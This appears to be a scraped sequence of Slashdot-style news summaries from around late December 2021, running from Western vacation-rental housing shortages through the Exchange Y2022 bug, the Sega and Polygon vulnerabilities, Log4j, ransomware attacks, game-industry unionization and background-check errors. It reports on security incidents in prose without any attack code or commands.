The CFO of a vacation-rental management company recently told Oregon Public Broadcasting that 20% of people renting a vacation home did so for the first time during the pandemic.

The nonprofit state policy news site Stateline sees a larger trend: Even before the pandemic, the destination towns of the West had a shortage of affordable housing. Limited supply, the remote nature of some of the communities, zoning restrictions and even short construction seasons all contributed.

But the COVID-19 pandemic accelerated everything, including the rise of so-called Zoom towns. Freed from physical offices, suddenly people could live, work and recreate in the vacation communities of the West, with few needs beyond a high-speed internet connection to do jobs that formerly required their presence in major cities. It also in recent years became much easier for owners of second homes to list vacancies with internet-based property firms that promise a steady cash flow in places with seasonal, tourism-based economies. When those homes enter the short-term vacation rental pool, they're no longer available to the local workforce. Brian Chesky, Airbnb's CEO, said recently that about one-fifth of the company's business by room nights is now stays of 30 days or more. People are booking longer stays that combine work and leisure, an area the company sees as full of potential growth...

There are few statewide efforts to address the effects of short-term rentals; some states, such as Idaho, outright prohibit local governments from enacting bans.... In general, the vacation rental industry also fights efforts to enact short-term moratoriums or bans...

[F]ew popular tourist communities in the West have enough affordable options for the staff necessary to run a vacation destination in peak season. In Montana, people who can't afford the rent in some tourist towns have been camping more regularly on public lands in the vicinity, encroaching on grizzly territory. The housing shortage has led directly to more encounters between bears and people, said Bill Avey, a National Forest supervisor in the region. In Whitefish, a gateway to Montana's Glacier National Park, the lack of affordable workforce housing in 2021 forced nearly all food- or beverage-related businesses to curtail hours or close at least one day a week at the height of the summer tourist season, said Lauren Oscilowski, who owns the Spotted Bear Spirits distillery. Over the past year, about half the people on her 11-person team have been forced to move because their landlords decided to turn their housing into more lucrative short-term rentals.

"There's this national thing where hospitality people aren't returning to hospitality because the wages are too low, or they're sick of dealing with the public or whatever it is," Oscilowski said. "But that's just a piece of it. The bigger piece for us is really housing...."

Kalper (Slashdot reader #57,281) shares news from Bleeping Computer: Microsoft Exchange on-premise servers cannot deliver email starting on January 1st, 2022, due to a "Year 2022" bug in the FIP-FS anti-malware scanning engine.

Starting with Exchange Server 2013, Microsoft enabled the FIP-FS anti-spam and anti-malware scanning engine by default to protect users from malicious email. According to numerous reports from Microsoft Exchange admins worldwide, a bug in the FIP-FS engine is blocking email delivery with on-premise servers starting at midnight on January 1st, 2022.

Security researcher and Exchange admin Joseph Roosen said that this is caused by Microsoft using a signed int32 variable to store the value of a date, which has a maximum value of 2,147,483,647. However, dates in 2022 have a minimum value of 2,201,010,001 or larger, which is greater than the maximum value that can be stored in the signed int32 variable, causing the scanning engine to fail and not release mail for delivery. When this bug is triggered, an 1106 error will appear in the Exchange Server's Event Log stating, "The FIP-FS Scan Process failed initialization. Error: 0x8004005. Error Details: Unspecified Error" or "Error Code: 0x80004005. Error Description: Can't convert "2201010001" to long." Microsoft will need to release an Exchange Server update that uses a larger variable to hold the date to officially fix this bug.

However, for on-premise Exchange Servers currently affected, admins have found that you can disable the FIP-FS scanning engine to allow email to start delivering again... Unfortunately, with this unofficial fix, delivered mail will no longer be scanned by Microsoft's scanning engine, leading to more malicious emails and spam getting through to users.

What could have been a damaging breach in one of Sega's servers appears to have been closed, according to a report by security firm VPN Overview. Engadget reports: The misconfigured Amazon Web Services S3 bucket contained sensitive information which allowed researchers to arbitrarily upload files to a huge swath of Sega-owned domains, as well credentials to abuse a 250,000-user email list. The domains impacted included the official landing pages for major franchises, including Sonic the Hedgehog, Bayonetta and Total War, as well as the Sega.com site itself. VPNO was able to run executable scripts on these sites which, as you can imagine, would have been quite bad if this breach had been discovered by malicious actors instead of researchers.

An improperly stored Mailchimp API key gave VPNO access to the aforementioned email list. The emails themselves were available in plaintext alongside associated IP addresses, and passwords that the researchers were able to un-hash. According to the report, "a malicious user could have distributed ransomware very effectively using SEGA's compromised email and cloud services." So far there's no indication that bad actors made use of this vulnerability before VPNO discovered and helped Sega to fix it.

Ethereum scaling project Polygon was at risk of losing nearly all of its MATIC tokens until it upgraded its network earlier this month. From a report The problem was a "critical" vulnerability in Polygon's proof-of-stake genesis contract, which could have allowed attackers to steal over 9.2 billion MATIC tokens (currently worth over $24 billion). The total supply of MATIC tokens is 10 billion. The vulnerability was reported on the bug bounty platform Immunefi by a whitehat hacker known as Leon Spacewalker. According to details shared Wednesday, the bug essentially could have allowed attackers to arbitrarily mint all of Polygon's more than 9.2 billion MATIC tokens from its MRC20 contract. After Spacewalker found the bug, Immunefi informed the Polygon team the same day. The team then confirmed the vulnerability and moved to update the Polygon network, initially with an update for its Mumbai testnet. According to Polygon, the testnet update was completed on December 4, and the team was preparing for the mainnet upgrade. Yet before the mainnet upgrade was undertaken, a malicious actor exploited the bug and stole 801,601 MATIC tokens (currently worth over $2 million). Polygon has said it will bear the cost of the theft.

Microsoft Defender for Endpoint is currently showing "sensor tampering" alerts linked to the company's newly deployed Microsoft 365 Defender scanner for Log4j processes. BleepingComputer reports: The alerts are reportedly mainly shown on Windows Server 2016 systems and warn of "possible sensor tampering in memory was detected by Microsoft Defender for Endpoint" created by an OpenHandleCollector.exe process. Admins have been dealing with this issue since at least December 23, according to customer reports.

While this Defender process' behavior is tagged as malicious, there's nothing to worry about since these are false positives, as revealed by Tomer Teller, Principal Group PM Manager at Microsoft, Enterprise Security Posture. Microsoft is currently looking into this Microsoft 365 Defender issue and working on a fix that the company should soon deliver to affected systems. "This is part of the work we did to detect Log4J instances on disk. The team is analyzing why it triggers the alert (it shouldn't of course)," Teller explained.

A group of Chinese attackers has been using the massive vulnerability in Log4j, common piece of open-source code, to target a large academic institution, Crowdstrike says. From a report: Experts say hundreds of millions of systems are vulnerable and that attacks based on the flaw are continuing. CrowdStrike said its software observed an attack that exploited the Log4j flaw in software from VMware. The attack came from a China-based group dubbed Aquatic Panda that has been conducting intelligence gathering and industrial espionage, CrowdStrike said. Some security experts, including Cybersecurity and Infrastructure Security Agency (CISA) head Jen Easterly, have called the flaw among the worst they have ever seen.

An anonymous reader shares a report: The HDMI standards are a mess. HDMI 2.1, in particular, is a uniquely frustrating mess, with haphazard support among TV manufacturers, cable makers, and devices that make setting up, say 120Hz gaming on a PS5 or Xbox Series X a uniquely harrowing experience. Fortunately, the HDMI Forum is swooping in ahead of CES with its latest revision to the HDMI specification stack, HDMI 2.1a, which is here to make everything better and simpler... I'm kidding, of course. It's gonna make things more complicated. It's a new HDMI standard, what on earth did you expect?

Let's start with the good: HDMI 2.1a is an upcoming revision to the HDMI 2.1 stack and adds a major new feature, Source-Based Tone Mapping, or SBTM. SBTM is a new HDR feature that offloads some of the HDR tone mapping to the content source (like your computer or set-top box) alongside the tone mapping that your TV or monitor is doing. SBTM isn't a new HDR standard -- it's not here to replace HDR10 or Dolby Vision. Instead, it's intended to help existing HDR setups work better by letting the content source better optimize the content it passes to the display or by removing the need to have the user manually calibrate their screens for HDR by having the source device configure content for the specific display. Other use cases could be for when there's a mix of content types, like for streamers (who could have an HDR game playing alongside a window of black and white text), displaying each area of content.

The ransomware attack that crippled the IT systems and live streams of Cox radio and TV stations earlier this year was the work of Iranian hackers, The Record has learned. From the report: The attack has been attributed to a threat actor tracked under the codename of DEV-0270, a group linked to several intrusions against US companies this year that have ended in the deployment of ransomware. While the intrusion at the Cox Media Group came to light on June 3, when the attackers deployed their ransomware and encrypted some internal servers, the group had actually breached and been lurking inside the company's internal network for weeks since mid-May. The attack did not impact all Cox Media Group radio and TV stations but managed to cripple the ability of some stations to broadcast live streams on their sites. The Cox Media Group initially tried to play down the attack. Local reporters who shared details about the ransomware incident on Twitter were admonished and told to delete tweets. The company did, however, formally confirm the attack in October, four months later, but without mentioning any details about the Iranian hackers.

"T-Mobile had another data breach," writes Slashdot reader motang. "This comes after the massive breach that affected millions of users this past summer." According to Android Police, a small number of accounts had their data viewed by an unknown individual -- including names, addresses, phone numbers, plan rates, and number of lines -- or fell victim to an unauthorized SIM swap, with a third subset of users facing both. From the report: For its part, the company has contacted individuals who were targeted in this breach, alerting them to specify what was or wasn't viewed and highlighting that this hacker stole no payment or password data to its knowledge. However, T-Mobile has yet to report any specifics about how many customers were directly affected. [...] It seems possible that this is another example of poor security practices, though we'll have to wait until T-Mobile delivers more information. The T-Mo Report was first to report the data breach.

An anonymous reader quotes a report from The Record: Amedia, the largest local news publisher in Norway, announced on Tuesday that several of its central computer systems were shut down in what it is calling an apparent "serious" cyberattack. The attack is preventing the company from printing Wednesday's edition of physical newspapers, and presses will continue to be halted until the issue is resolved, Amedia executive vice president of technology Pal Nedregotten said in a statement. The hack also impacts the company's advertising and subscription systems, preventing advertisers from purchasing new ads and stopping subscribers from ordering or canceling subscriptions.

The company said it is unclear whether personal information has been compromised -- the subscription system affected by the attack contains names, addresses, phone numbers, and subscription history of customers. Data such as passwords, read history, and financial information are not affected, the company said. Amedia publishes more than 90 newspapers and other publications that reach more than 2.5 million Norwegians, according to the company's website. The attack on Amedia is the third major Norwegian cyberattack reported over the last several days. "We are in the process of gaining an overview of the situation, but do not yet know the full potential for damage. We have already implemented comprehensive measures to limit the damage and to restore normal operations as quickly as possible," said Nedregotten in a translated statement on the company's website.

Did LastPass get hacked? Gizmodo: Some users of the popular password manager recently received emails from the company warning them of suspicious login attempts that were utilizing their master password -- definitely never a great sign. Speculation soon spread that LastPass may have suffered a data breach that exposed users' credentials, thus allowing for the malicious activity to take place.

According to LastPass itself, the answer is: We don't think so. When reached for comment by Gizmodo, the company provided us with a statement blaming the irregular activity on "credential stuffing" attempts by some unknown threat actor: "LastPass investigated recent reports of blocked login attempts and we believe the activity is related to attempted 'credential stuffing' activity, in which a malicious or bad actor attempts to access user accounts (in this case, LastPass) using email addresses and passwords obtained from third-party breaches related to other unaffiliated services.

Photography and personalized photo giant Shutterfly has suffered a Conti ransomware attack that allegedly encrypted thousands of devices and stole corporate data. BleepingComputer reports: On Friday, a source told BleepingComputer that Shutterfly suffered a ransomware attack approximately two weeks ago by the Conti gang, who claims to have encrypted over 4,000 devices and 120 VMware ESXi servers. While BleepingComputer has not seen the negotiations for the attack, we are told that they are underway in progress and that the ransomware gang is demanding millions of dollars as a ransom. Conti has created a private Shutterfly data leak page containing screenshots of files allegedly stolen during the ransomware attack, as part of this "double-extortion" tactic. The attackers threaten to make this page public if a ransom is not paid.

BleepingComputer has been told that these screenshots include legal agreements, bank and merchant account info, login credentials for corporate services, spreadsheets, and what appears to be customer information, including the last four digits of credit cards. Conti also claims to have the source code for Shutterfly's store, but it is unclear if the ransomware gang means Shutterfly.com or another website. After contacting Shutterfly on Friday about the attack, BleepingCompuer was sent a statement confirming the ransomware attack late Sunday night. This statement [...] says that the Shutterfly.com, Snapfish, TinyPrints, or Spoonflower sites were not affected by the attack. However, their corporate network, Lifetouch, BorrowLeneses, and Groovebook had disrupted services. While Shutterfly states that no financial information was disclosed, BleepingComputer was told that one of the screenshots contains the last four digits of credit cards, so it is unclear if there is further, and more concerning, information stolen during the attack.

Customer support has become a crowded battlefield in enterprise technology as software vendors from Microsoft to Salesforce rush to arm organizations with tools to create one-stop service centers. From a report: The attention is revitalizing the call center, a once-backwater unit that has long suffered from high turnover rates and minimal corporate investment. Salesforce, ServiceNow, Twilio and Genesys Cloud Services are among the companies that see the call center as a critical part of efforts to transform the consumer base from a sea of faceless pocketbooks to potentially millions of unique personas. It's viewed as a way to improve customer service and bolster brand loyalty at a time when businesses are increasingly worried about churn.

Zoom Video Communications was prepared to fork over $14.7 billion in stock to buy Five9 to gain a foothold in the contact center industry. But Five9 shareholders ultimately thought the price was too low and turned down the deal, a testament to just how much the sector is expected to grow in the coming years. "Instead of being a cost center, it's a lifetime value driver," said Vasili Triant, chief operating officer at UJET, a closely held San Francisco-based call center cloud software provider. As a result, "this space has drawn a lot of attention. Companies need to improve experience. Because of that, a lot of money has flown into it. When money flows into it, people see a huge opportunity."

Historically, customer support software was viewed as a money pit -- systems that were necessary to help field consumer complaints or inquiries but produced little return on investment. Many businesses simply wanted to pick a product, deploy it and forget about it. As a result, the market was fragmented between just a handful of top vendors, including Genesys, Cisco Systems and Avaya. But as more companies move those systems to the internet, that mindset is undergoing a seismic shift. For the last several years, the focus has been on helping call center agents provide better customer support and cut down on service times. That has meant taking steps like consolidating different applications onto a single desktop interface, alleviating the need for agents to toggle between different tabs to view customer data stored in various places.

A team of academics said it found more than 1,200 phishing toolkits deployed in the wild that are capable of intercepting and allowing cybercriminals to bypass two-factor authentication (2FA) security codes. From a report: Also known as MitM (Man-in-the-Middle) phishing toolkits, these tools have become extremely popular in the cybercrime underworld in recent years after major tech companies started making 2FA a default security feature for their users. The direct result was that threat actors who managed to trick a user into entering credentials on a phishing site found that the stolen credentials became useless since they couldn't bypass the 2FA procedure. To counter this new trend in account security protections, since at least 2017, threat actors started adopting new tools that would allow them to bypass 2FA by stealing a user's authentication cookies, which are files created inside a web browser once the user has logged into an account after the 2FA process was completed. In most instances, cybercrime groups have relied on a malware category known as an "infostealer" to steal these authentication cookie files from computers they managed to infect. However, there is another way to steal these files that does not rely on infecting a computer with malware -- namely, by stealing the authentication cookies while they transit the internet from the service provider to a user's computer.

"Video game companies in North America have never successfully unionized," reports the Washington Post. "That changed December 16, when a union at the indie developer Vodeo Games was recognized by management." While video game companies rake in billions of dollars, their workers complain of unfair labor practices, long hours, sexual harassment and workplace misconduct... In the past, game workers would avoid speaking out publicly against their employer, as it could tarnish their reputation within the industry and make it difficult to find future jobs. But after decades of major gaming companies expecting employees to work 80- or 90-hour workweeks, and of workers fearing retaliation from management, Vodeo employees told The Post that the tide was changing...

What's happening in the games industry at Activision Blizzard and Vodeo is unprecedented. No single gaming company like Activision Blizzard has dominated the headlines with lawsuit after lawsuit for months before, topped off with an explosive Wall Street Journal report in November that claimed CEO Bobby Kotick did not inform the company's board of directors for years about sexual misconduct allegations. A petition calling for Kotick's resignation that was circulated among employees netted over 1,850 signatures... At least several dozen Activision Blizzard workers across the company are in the midst of their third work stoppage following a California state agency lawsuit that alleged widespread sexual harassment and misconduct at the company. The strike is on its third week as workers demand that management rehire 12 contractors from Call of Duty developer Raven Software and promote all Raven quality assurance testers to full-time status. Some in-person demonstrations have taken place at the quality assurance office in Austin, Texas.

Activision Blizzard management responded to employees in a Dec. 10 email that ongoing work toward improving company culture would be best achieved without a union...

Activision Blizzard's tumultuous battle with lawsuits, government investigations and worker protests has Wall Street analysts downgrading their rating of its stock. Unionization would further lower the company's market value, according to Wedbush Securities analyst Michael Pachter. "If they were to succeed [in unionizing], the company would have to determine whether to recognize the union or to bust it," Pachter said. "If only the hourly workers chose unionization, Activision could decide whether it is cheaper to recognize them or to export their jobs to a nonunion locale."

That possibility looms large for workers in the industry. "I do fear for my job," said Aubrey Ryan, a contractor working for Blizzard. "Even if I'm fired, I have been part of a movement that is going to change the games industry. I might not benefit, but future people like me will."
Some interesting quotes from two pro-union figures interviewed by the Post:

• "There's been a lot of groundwork that's been happening in the game industry over the last few years in terms of raising awareness about unions." — Vodeo designer Carolyn Jong

• "Vodeo has broken the ice on smaller studios. There are definitely folks at smaller studios that are realizing that unions are not just for triple A studios..." — a Southern California games-industry organizer

Slashdot reader dcblogs writes: Criminal background checks that incorrectly identify an applicant as a thief or sex offender happen more often than many expect. This story reviewed more than 75 lawsuits against background checks firms, spoke with plaintiff attorneys and industry experts to paint a picture of an industry that can ruin lives in minutes. Job applicants are labeled thieves and sex offenders by incorrect reports, and job candidates may protest, but it may not do them any good. Employers may drop them as damaged goods before the correction.
From the article: Some of the errors detailed in lawsuits against background check firms are inexplicable and show a lack of basic attention to detail. Common mistakes include mismatched names and addresses. One background check lawsuit alleged that the first name of Ashley was misidentified as Alysha. In another case, two people with the same first and last name were mixed up despite their distinct middle names: Magdalena and Elena... In another lawsuit, an applicant with a middle name of Scot (one T) was confused with someone whose middle name was Scott (two T's). A background check firm told one job applicant that his Social Security number was in the government's "Death Master File...."
"The candidate may protest. But by then, HR has likely dropped the candidate in an effort to fill an open position," the article points out, offering one example where a corrected background check then arrived, but several weeks later. (The man's lawyer believes it's common for employers to then still refuse to consider an applicaton, simply because "first impressions are everything.")

The article adds that the U.S. Consumer Financial Protection Bureau is now "threatening enforcement actions in concert with the U.S. Federal Trade Commission and Department of Justice." They've already issued an advisory in November calling out "shoddy name matching procedures" used to link people with criminal and other records, and warned that "Even ostensibly low error rates can harm significant numbers of consumers" — especially since more than 90% of U.S. employers use background check data in their hiring processes.

"While the lack of funding in open source is certainly a problem, could funding have prevented the Log4j vulnerabilities?" asks Mike Melanson's "This Week in Programming" column. "Would funding actually prevent similar vulnerabilities in the future...?"

Or is that an oversimplification? In a blog post for the Linux Foundation's Open Source Security Foundation (OpenSSF), Brian Behlendorf argued that open source foundations must work together to prevent the next Log4Shell scramble, outlining seven points that OSS foundations could do to mitigate security risks. Among those seven points — which include security scanning, outside audits, dependency tracking, test frameworks, organization-wide security teams, and requiring projects to remove old, vulnerable code — not once was funding mentioned. Rather, Behlendorf precedes these points by saying that "Too many organizations have failed to apply raised funds or set process standards to improve their security practices, and have unwisely tilted in favor of quantity over quality of code."

Behlendorf continues after his list of seven suggested acts with a section that boils everything down perfectly:

"None of the above practices is about paying developers more, or channeling funds directly from users of software to developers. Don't get me wrong, open source developers and the people who support them should be paid more and appreciated more in general. However, it would be an insult to most maintainers to suggest that if you'd just slipped more money into their pockets they would have written more secure code. At the same time, it's fair to say a tragedy-of-the-commons hits when every downstream user assumes that these practices are in place, being done and paid for by someone else."

Behlendorf does go on to make some points about funds and fundraising, but his point is less on the lack of funding than the allocation of those funds and how they need to be focused on things like paid audits and "providing resources to move critical projects or segments of code to memory-safe languages, or fund bounties for more tests."

Behlendorf says that, in the new year, the OpenSSF will be working to "raise the floor" for security in open source.

"The only way we do this effectively is to develop tools, guidance, and standards that make adoption by the open source community encouraged and practical rather than burdensome or bureaucratic," he wrote. "We will be working with and making grants to other open source projects and foundations to help them improve their security game."
Behlendorf was a founding member of the Apache Group, which later became the Apache Software Foundation.

So as a long-time member of the Open Source community, he calls the Log4j vulnerabilities "a humbling reminder of just how far we still have to go."

The Albanian government has confirmed and apologized this week for a data leak that exposed the personal and salary-related information for 637,138 citizens, more than 22% of the country's entire population. From a report: Details such as names, ID card numbers, salaries, job positions, and employer names were shared over the weekend on WhatsApp as an Excel document. The file included what appeared to be tax and salary information filed by companies with the Albanian government for the month of January 2021, according to local media. In a press conference today, Prime Minister Edi Rama confirmed and apologized for the breach. "According to a preliminary analysis, it looks more like an internal infiltration rather than an outside [...] cyber-attack," Rama told reporters, according to the Associated Press. The leak is now being investigated by the Tirana Prosecutor's Office, a government spokesperson said.

White House officials are asking major software companies and developers to work with them to improve the security of open-source software, according to an administration official. From a report: The invitation follows the disclosure of a vulnerability in popular open-source Apache software that cybersecurity officials have described as one of the most serious in recent memory. In a letter Thursday, National Security Advisor Jake Sullivan invited major players in the software industry to discuss initiatives to improve open-source software security, the official said. Dozens of open-source software projects have become crucial components of global commerce and are mostly maintained by volunteers. The effort will start with a one-day discussion in January hosted by Anne Neuberger, the deputy national security advisor for cyber and emerging technology, according to the official. In the letter, Sullivan wrote that open-source software has accelerated the pace of innovation but pointed out that the fact that it is broadly used and maintained by volunteers is a "combination that is a key national security concern, as we are experiencing with the Log4j vulnerability," the official said.

'Exhausted' network defenders say technological dependency creates new vulnerabilities. From a report: Cyberattacks on major technology providers and the interconnected world of software and hardware that power the global economy continued at a relentless pace in 2021, according to U.S. officials and security experts. Instead of one company being victimized at a time like in a traditional data breach, thousands were often exposed simultaneously. Businesses, hospitals and schools also worked to defend themselves against an onslaught of ransomware attacks, which increasingly reap $10 million or more in extortion payments. The annus horribilis culminated this month with discovery of a flaw in an obscure but widely used internet code known as Log4j, which one senior Biden administration official said was the worst she had seen in her career. The latest vulnerability comes as U.S. officials warn corporate leaders of a potential surge of cyberattacks while businesses slow their operations during the holiday season.

The string of incidents highlights how decades of digital transformation have linked business and government computer systems in opaque and sometimes surprising ways that will create new vulnerabilities. Major disruptions are certain to continue, cybersecurity officials said. "Network defenders are exhausted," said Joe Slowik, threat-intelligence lead at the security firm Gigamon. New attention and investment in cybersecurity hasn't improved the status quo, he said. "Money is flowing into the field, but largely on technical solutions while the core need -- more capable people -- remains hard to address."